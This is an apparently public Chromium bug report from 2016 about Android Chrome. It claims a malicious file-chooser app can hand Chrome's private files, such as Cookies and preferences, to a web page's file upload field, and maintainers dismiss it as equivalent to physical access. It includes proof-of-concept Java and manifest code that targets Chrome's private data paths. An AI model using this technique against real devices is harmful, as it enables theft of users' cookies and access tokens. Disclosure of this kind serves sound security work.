Issue metadata
Sign in to add a comment
|
Security: Android Chrome allows to choose private files via <input type="file" id="fileinput" />
Reported by
dmitry.l...@gmail.com,
Apr 17 2016
|
||||||||||||||||||
Issue description
VULNERABILITY DETAILS
Android Chrome allows to choose private files via <input type="file" id="fileinput" />. If user has malicious file chooser app, than this app can attach private files from "/data/data/com.android.chrome/" directory. On malicious web pages this may lead to user private information(Cookies, access tokens and etc) leak.
VERSION
Chrome Version: 49.0.2623.105 stable
Operating System: Android 6.0.1 with April 04.2016 security update
REPRODUCTION CASE
1) Declare in AndroidManifest.xml ChooserActivity:
<activity
android:name=".ChooserActivity"
android:label="ChromeMaliciousChooser">
<intent-filter>
<action android:name="android.intent.action.CHOOSER"/>
<category android:name="android.intent.category.DEFAULT"/>
</intent-filter>
</activity>
2) Add file choose code, user won't know which file was actually attached, this sample will attach default preferences file or Cookies (like in provided PoC)
@Override
public void onClick(View view) {
if (view.getId() == R.id.choosePreferencesButton) {
pickFile("shared_prefs/com.android.chrome_preferences.xml", "*/*");
} else if (view.getId() == R.id.chooseCookiesButton) {
pickFile("app_chrome/Default/Cookies", "*/*");
}
}
public void pickFile(String privateFileName, String type) {
Uri uri = Uri.parse("file:///data/data/" + PACKAGE_NAME + "/" + privateFileName);
Intent intent = new Intent();
intent.setDataAndType(uri, type);
setResult(RESULT_OK, intent);
finish();
}
3) Create some malicious web page which will ask user to upload files with
<input type="file" id="fileinput" />
4) Load malicious web page (for example our malicious app can open this page automatically)
5) Press "Choose file" button and choose file through our Malicious choose picker
6) Sure that selected file have private content.
PoC:
I attach PoC with android malicious chooser and basic web page code.
Video (accessed only by url): https://youtu.be/SMWUz4PJ8AY
,
Apr 18 2016
Hi Could you please look video that I provided? (https://youtu.be/SMWUz4PJ8AY) I'm not sure that you correctly understand me, why you marked this as physicall attack? If user has malicious chooser app than he can't be sure that he uploads selected file! It may be some malicious photo gallery app and he will think that he uploads selected photo file, but actually will be uploaded file with Cookies. There is no check about private files attachment.
,
Apr 19 2016
The pre-condition that user has malicious chooser app is the entirety of the bug.
,
Apr 19 2016
Getting that app onto the phone requires the equivalent of physical access.
,
Apr 20 2016
In Android user must have File Chooser app, if System does't contains such app, than user won't be able to select any files and upload them. There are plenty alternative file chooser apps in Google Play, could you guarantee that nobody use this attack? Nope, because there is no any prevention to attach such files. >Getting that app onto the phone requires the equivalent of physical access. In the same way we can say that opening some url in browser is also equivalent of physicall access (because url won't be opened automatically, as malicious file chooser app won't be installed from Google Play)
,
Jul 26 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 2 2016
|
|||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||
Comment 1 by tsepez@chromium.org
, Apr 18 2016